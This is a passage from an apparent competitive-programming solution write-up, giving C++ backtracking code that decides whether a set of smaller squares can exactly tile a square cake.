Choose a square and place it in the area whose upper-left cell is \(C_{i, j}\). If this cannot lead to a solution, backtrack and try another square; otherwise continue to the end and obtain a solution.
Source code in C++:
#include <iostream>
#include <cstring>
#include <algorithm>
using namespace std;

int s, n;        // side of the cake, number of squares
char cs[11];     // cs[i]: how many squares of side i remain
char lens[41];   // lens[j]: current filled height of column j

bool dfs(int x) {
    if (x == n) {   // all squares placed
        return true;
    }
    // Find the leftmost column m with the lowest filled height, and the
    // number w of consecutive columns sharing that height.
    int m = 1, w = 1, suc = 1;
    for (int i = 2; i <= s; ++i) {
        if (lens[i] < lens[m]) {
            m = i, w = 1, suc = 1;
        } else if (lens[i] == lens[m] && suc) {
            ++w;
        } else {
            suc = 0;
        }
    }
    // Try to place a square whose upper-left corner sits on column m,
    // from the largest side that fits down to 1.
    for (int i = min(10, w); i >= 1; --i) {
        if (cs[i] > 0 && lens[m] + i <= s) {
            cs[i]--;
            for (int j = m; j < m + i; ++j) {
                lens[j] += i;
            }
            if (dfs(x + 1)) {
                return true;
            }
            for (int j = m; j < m + i; ++j) {   // backtrack
                lens[j] -= i;
            }
            cs[i]++;
        }
    }
    return false;
}

bool solve() {
    cin >> s >> n;
    memset(cs, 0, sizeof(cs));
    memset(lens, 0, sizeof(lens));
    int sum = 0, tmp;
    for (int i = 0; i < n; ++i) {
        cin >> tmp;
        cs[tmp]++;
        sum += tmp * tmp;   // total area of the squares
    }
    if (sum != s * s) {     // the squares must exactly cover the cake
        return false;
    }
    return dfs(0);
}

int main() {
    int t;
    cin >> t;
    while (t--) {
        if (solve()) {
            cout << "KHOOOOB!" << endl;
        } else {
            cout << "HUTUTU!" << endl;
        }
    }
}